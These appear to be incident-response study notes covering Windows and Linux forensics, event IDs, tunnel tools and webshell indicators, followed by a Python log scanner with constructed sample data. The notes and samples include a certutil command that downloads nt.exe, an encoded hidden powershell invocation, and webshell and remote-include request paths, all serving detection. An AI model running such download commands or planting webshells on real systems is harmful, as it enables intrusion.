* CyberLab - 貓味,你坐阿 5/5
  * Incident-response lifecycle: Preparation (network topology (segments), device types/purposes) --> Detection & analysis --> Removal & recovery --> Post-incident review
  * Investigation approach
    * People: who was attacked; confirm the source of the attacker
    * Event: confirm the incident category; check whether it has happened before
    * Time: confirm when the attack took place
    * Place: confirm the affected network segment, who can access it, and how it is normally managed
    * Things: confirm what was created and what was leaked
    * Incident quadrant chart (scored 1-7)
  * Defense
    * Log
    * Memory
    * Networking
    * HDD
    * Reversing
  * Attack
    * Enumeration
    * Real-Life
      * CVE
      * Custom Exploitation
    * CTF-Life
  * Forensics
    * History & Log
      * Shell history
      * Web access log
      * Eventlog
    * Process
      * Services
      * Connection
    * File
      * App (binary, script)
      * Autoruns
      * Config
    * Example 1: apache/nginx access log entries worth flagging
      * /admine21_decode.php
      * /s.php
      * /npv/xxxx
      * /admin-post.php?swp_url=https://pastbin.com/raw/aaaa
  * Common tunnel tools
    * TCP
      * EarthWorm
      * termite
      * SSocks
      * tunna
      * Netcat
      * LCX
    * SSH
    * HTTP tunnel
      * reGeorg
      * frp
      * ngrok
  * Linux forensics
    * ps -ef
    * ls /proc
    * strace -f -p pid
    * lsof -i:port
    * lsof -p pid
    * crontab -e
    * cat /etc/rc.local
    * ls /etc/init.d
    * ls /etc/profile.d
    * ls /var/log/cron*
    * ls /var/log/secure*
  * A few easy entry points
    * WordPress CVE vulnerabilities, e.g. CVE-2019-9978 (RCE)
    * Uploaded webshell, hacktool, VPN
    * The key is the attacker's lateral-movement trail
      * S.php
      * admine21_decode.php
      * nt.exe ...
  * Windows forensics
    * History & Log
      * Web access (IIS log)
      * Eventlog (4688, Sysmon)
    * Process
      * Services
      * Connection
    * File
      * App (binary, script)
      * Autoruns
      * Config
    * Execution history
      * Shimcache (reads the application compatibility Shim cache stored in the Windows registry; metadata of files executed on a Windows system is placed in this data structure on the running system)
        * File full path
        * File size
        * $Standard_Information (SI) last modified time
        * Shimcache last updated time
        * Process execution flag
      * Amcache (the Amcache.hve file is a registry hive that stores information about executed applications)
    * Eventlog
      * IIS log
      * Event ID 4688
      * powershell spawned by w3wp.exe (the attacker abuses the w3wp.exe process, which runs with elevated privileges by default, to execute under PowerShell and load a malicious DLL)
      * IIS MDMP memory dump
      * certutil -urlcache -split -f http://192.168.1.2/nt.exe nt.exe
      * Exploitation -> webshell, hacktool, password
      * nt.exe, Bbb.aspx, SQLDmpr0001.mdmp
      * Bt.exe, testbbbb.aspx, SQLDuMPER_ERRORLOG, 123.txt, test.aspx
    * Eventlog categories
      * Security
        * 4688: process created
        * 4624: logon succeeded
        * 4625: logon failed
        * 4648: a logon was attempted using explicit credentials
        * 5156: a connection was allowed
        * 1102: log was cleared
        * 4720: user account created
        * 4722: user account enabled
        * 4742: password reset
        * 4732: member added to a local group
      * System
        * 7009: service error
        * 7045: service start
        * 7031: service interrupted
        * 7036: service changed status
        * 7032: service start error
        * 7034: service interrupted many times
      * PowerShell
        * 400
        * 403
        * 4104: script block logging
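As an added example (not part of the original notes), a small Python scanner that applies the indicators above to constructed sample data: the webshell paths and the swp_url remote-include parameter from example 1 against nginx access-log lines, and the w3wp.exe -> powershell and certutil -urlcache patterns from the Windows section against simplified 4688 process-creation records. All log lines, file paths and the 203.0.113.x / 192.0.2.x addresses are constructed for illustration.

```python
import re

# Constructed nginx access-log lines (not from a real incident) exercising the
# indicators in example 1: known webshell paths and a swp_url remote include.
ACCESS_LOG = """\
203.0.113.5 - - [05/May/2020:10:01:02 +0800] "GET /index.php HTTP/1.1" 200 512
203.0.113.9 - - [05/May/2020:10:02:11 +0800] "POST /s.php HTTP/1.1" 200 77
203.0.113.9 - - [05/May/2020:10:02:40 +0800] "GET /admin-post.php?swp_url=https://paste.example/raw/aaaa HTTP/1.1" 200 1030
203.0.113.7 - - [05/May/2020:10:03:00 +0800] "GET /wp-login.php HTTP/1.1" 302 0
"""

# Constructed 4688-style process-creation records reduced to the fields the notes
# point at (parent, new process, command line) for the w3wp.exe and certutil cases.
PROC_EVENTS = [
    {"parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\inetsrv\w3wp.exe", "cmdline": "w3wp.exe -ap DefaultAppPool"},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell -nop -w hidden -enc AAAA"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe", "cmdline": "certutil -urlcache -split -f http://192.0.2.10/nt.exe nt.exe"},
]

WEBSHELL_PATHS = {"/s.php", "/admine21_decode.php"}            # webshell names from example 1
SWP_URL_RE = re.compile(r"swp_url=https?://")                   # remote content pulled through swp_url
REQ_RE = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+"')      # request line inside a combined-format entry

def flag_access_log(text):
    """Return (line_no, reason) for requests hitting webshell paths or remote-include parameters."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        path, _, query = m.group("path").partition("?")
        if path in WEBSHELL_PATHS:
            hits.append((n, f"known webshell path {path}"))
        elif SWP_URL_RE.search(query):
            hits.append((n, "swp_url parameter pointing at a remote URL"))
    return hits

def flag_process_events(events):
    """Return reasons for 4688 records: IIS worker spawning a shell, or certutil used as a downloader."""
    hits = []
    for e in events:
        parent = e["parent"].rsplit("\\", 1)[-1].lower()
        image = e["image"].rsplit("\\", 1)[-1].lower()
        cmd = e["cmdline"].lower()
        if parent == "w3wp.exe" and image in {"powershell.exe", "cmd.exe"}:
            hits.append(f"{parent} spawned {image}")
        if image == "certutil.exe" and "-urlcache" in cmd and re.search(r"https?://", cmd):
            hits.append("certutil -urlcache download: " + e["cmdline"])
    return hits
```

Run both functions over real exports (web access log text and 4688 events reduced to parent/image/command line) to get a first triage list; the matches are starting points for the process, connection and file checks in the outline, not a verdict by themselves.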